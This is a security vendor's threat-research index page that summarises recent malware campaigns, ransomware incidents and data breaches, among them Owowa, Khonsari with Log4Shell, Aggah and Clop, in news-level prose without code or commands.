Anvilogic Forge Threat Research Reports
Here you can find an accumulation of trending threats published weekly by the Anvilogic team.
We curate threat intelligence to provide situational awareness and actionable insights
Atomic detections that serve as the foundation of our detection framework.
Risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
• Threat News Reports
• Trending Threat Reports
• ResearchArticles
Forge Report: First Half Threat Trends of 2024
Featured Threat Reports
All Threat Reports
Threat Group Aggah (TH-157)
Yoroi Malware ZLAB tracks Aggah (TH-157) targeting Eastern Europe with a nine-stage attack involving malicious PowerPoint macros, MSHTA execution, and AgentTesla infostealer. The group varies payload delivery infrastructure every 80 minutes, targeting Ukraine, Lithuania, Italy, and additional Eastern European countries for reconnaissance and data theft.
Sports Gear Sites Data Breach Impacts 1.8 Million People
A cyberattack on Tackle Warehouse, Running Warehouse, Tennis Warehouse, and Skate Warehouse compromised credit card information of 1.8 million customers. Disclosed by a representing law firm, the breach includes names, financial account numbers, credit/debit card numbers with CVV, and account passwords. Notices were sent to affected customers without identity protection services.
Malicious Microsoft Exchange IIS Module Owowa
Kaspersky has identified a malicious implant targeting Microsoft Exchange Outlook Web Access (OWA) applications, dubbed "Owowa." The implant enables remote command execution and captures user credentials from authenticated OWA users. Discovered in late 2020, Owowa has been circulating since April 2021 in parts of Europe, Malaysia, Mongolia, Indonesia, and the Philippines. The malicious module, named "ExtenderControlDesigner," is loaded via a PowerShell script.
Khonsari Ransomware & Log4Shell
The Khonsari ransomware family leverages the Log4Shell vulnerability (CVE-2021-44228) to target Windows servers. The malware executable "groenhuyzen.exe" exploits the JNDI class, encrypting user directories (Documents, Videos, Pictures, Downloads, Desktop) on all mounted drives except for the C:\ drive. The ransomware appends the extension .khonsari to encrypted files.
Dark Hotel APT Group
Zscaler ThreatLabz has identified recent activities by the Dark Hotel APT group from South Korea. The group uses multi-layered malicious documents, dropping RTF files, and employing advanced persistence techniques such as registry key creation and encoded PowerShell commands.
Clop Ransomware Publishes Confidential Police Data
As reported by 'The Mail' on December 19th, 2021, the Clop ransomware gang compromised IT services provider Dacoll in October 2021 and obtained data from a police national computer (PNC). After Dacoll refused to pay the ransom demand, the threat group posted the data on the dark web. The leaked data includes images of motorists captured by the UK's National Automatic Number Plate Recognition (ANPR) system.
.png)
Intelligence Levels for Threat Reports
Tactical
Detectable threat behaviors for response with threat scenarios or threat identifiers.
Strategic
General information security news, for awareness.
.png)
Whitepapers
The World's Best SOC Teams Use Anvilogic
.png)
.svg)
.svg)
.svg)
.svg)
.svg)
